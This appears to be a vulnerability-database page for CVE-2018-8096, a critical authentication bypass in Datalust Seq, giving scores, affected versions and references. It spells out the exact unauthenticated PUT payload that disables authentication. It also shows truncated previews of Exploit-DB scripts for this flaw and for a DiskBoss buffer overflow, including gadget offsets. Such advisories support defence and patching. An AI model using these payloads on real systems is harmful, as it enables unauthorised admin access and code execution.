CVE-2018-8096
published 2018-03-14CVE-2018-8096: Datalust Seq before 4.2.605 is vulnerable to Authentication Bypass (with the attacker obtaining admin access) via…
PriorityP180critical9.8CVSS 3.0
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
50.06%
98.8th percentile
Datalust Seq before 4.2.605 is vulnerable to Authentication Bypass (with the attacker obtaining admin access) via '"Name":"isauthenticationenabled","Value":false' in an api/settings/setting-isauthenticationenabled PUT request.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| datalust | seq | < 4.2.605 | 4.2.605 |
Detection & IOCsextracted from sources · hover to see the quote
- ·The exploit requires no prior authentication; the PUT request to the settings API is accepted without credentials, granting the attacker full admin access. ↗
CVSS provenance
nvdv3.09.8CRITICALCVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Seq 4.2.476 - Authentication Bypass
exploitdb·2018-08-02·CVSS 9.8
CVE-2018-8096 [CRITICAL] Seq 4.2.476 - Authentication Bypass
Seq 4.2.476 - Authentication Bypass
---
# Exploit Title: Seq 4.2.476 - Authentication Bypass
# Date: 2018-08-02
# Exploit Author: Daniel Chactoura
# Vendor Homepage: https://getseq.net/
# Software Link: https://getseq.net/Download/All
# Version: <= 4.2.476
# CVE : CVE-2018-8096
# Post Reference: https://medium.com/stolabs/bypass-admin-authentication-on-seq-17f0f9e02732
# coding=utf-8
#!/bin/python
import sys
import requests
def verifyArgs(args):
if len(args) < 2:
print('[!] Usage: '+str(args[0])+' https://target')
exit(0)
elif 'http' not in str(args[1]):
print('''[!] Missing "https://" !''')
exit(0)
else:
return(1)
def verifyVersion(url):
vulnVersions = ['4.2.476','4.2.470','4.1.17','4.1.16',
'4.1.14','4.0.60','4.0.58','3.4.20',
'3.4.18','3.4.17','3.3.23','3.3.22',
'3.3.21','3.3.20'
Exploit-DB
DiskBoss Enterprise 8.8.16 - Remote Buffer Overflow
exploitdb·2018-01-10·CVSS 9.8
CVE-2018-5262 [CRITICAL] DiskBoss Enterprise 8.8.16 - Remote Buffer Overflow
DiskBoss Enterprise 8.8.16 - Remote Buffer Overflow
---
# Exploit Title: DiskBoss <= 8.8.16 - Unauthenticated Remote Code Execution
# Date: 2017-08-27
# Exploit Author: Arris Huijgen
# Vendor Homepage: http://www.diskboss.com/
# Software Link: http://www.diskboss.com/setups/diskbossent_setup_v8.8.16.exe
# Version: Through 8.8.16
# Tested on: Windows 7 SP1 x64, Windows XP SP3 x86
# CVE: CVE-2018-5262
# Usage
# 1. Update the Target section
# 2. Update the shellcode
# 3. Launch!
import socket
from struct import pack
# Software editions (port, offset)
free8416 = (8096, 0x10036e9a) # ADD ESP,8 | RET 0x04 @ libdbs.dll
pro8416 = (8097, 0x10036e9a) # ADD ESP,8 | RET 0x04 @ libdbs.dll
ult8416 = (8098, 0x10036e9a) # ADD ESP,8 | RET 0x04 @ libdbs.dll
srv8416 = (8094, 0x1001806e) # ADD ESP,8 | R
No writeups or analysis indexed.
https://github.com/datalust/seq-tickets/issues/675https://medium.com/stolabs/bypass-admin-authentication-on-seq-17f0f9e02732https://www.exploit-db.com/exploits/45136/https://github.com/datalust/seq-tickets/issues/675https://medium.com/stolabs/bypass-admin-authentication-on-seq-17f0f9e02732https://www.exploit-db.com/exploits/45136/
2018-03-14
Published